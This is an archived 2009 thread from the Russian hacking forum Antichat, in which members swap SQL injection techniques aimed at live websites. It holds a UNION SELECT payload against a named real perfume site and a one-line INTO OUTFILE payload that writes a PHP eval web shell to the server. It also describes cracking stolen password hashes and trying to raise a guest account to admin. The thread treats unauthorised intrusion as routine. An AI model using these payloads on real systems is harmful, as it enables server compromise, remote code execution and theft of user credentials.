ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.01.2009, 22:47
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
http://www.aroma-france.info/parfums.php?poll=17%27/**/union/**/select%20version(),2,3,4,5--%20-
|
|
|

28.01.2009, 22:51
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме: 504278
Репутация:
114
|
|
Тупой вопрос. Как с помощью скули залить шелл?
Или слить двиг?
|
|
|

28.01.2009, 22:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2 Arigona поищи на форуме. есть куча флуда на енту тему да и тема есть отдельная
|
|
|

28.01.2009, 22:53
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от Arigona
Тупой вопрос. Как с помощью скули залить шелл?
union+select+1,'<?php eval($_GET[‘cmd’]) ?>',3 INTO OUTFILE 'путь/shell.php'--
Последний раз редактировалось R1dex; 28.01.2009 в 22:56..
|
|
|

28.01.2009, 22:55
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме: 504278
Репутация:
114
|
|
путь/shell.php это путь к шеллу лежащему к примеру на бесплатном хосте, или путь где сохраниться он?
|
|
|

28.01.2009, 22:58
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме: 504278
Репутация:
114
|
|
Access denied for user 'a4860939_df'@'localhost' (using password: YES)
Пишет -\
|
|
|

28.01.2009, 23:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
полный путь куда тебе надо залить шелл
например /server/www/public_html/site/images/shell.php
у каждого сайта свой путь по поводу путей опять же поищи на форумe
|
|
|

28.01.2009, 23:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Arigona Поиск по форуму, вот одна из тем:
https://forum.antichat.ru/threadnav34338-1-10.html
В этой теме , несколько страниц назад, велась та=же беседа на 10 листов,
можешь почитать отсюда посты kevmen'а и ответы на них:
https://forum.antichat.ru/threadnav46016-502-10.html
не нужно её повторять, пожалуйста 
|
|
|

28.01.2009, 23:34
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме: 267117
Репутация:
1
|
|
У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Последний раз редактировалось omel; 28.01.2009 в 23:38..
|
|
|

29.01.2009, 00:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
Сообщение от omel
У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|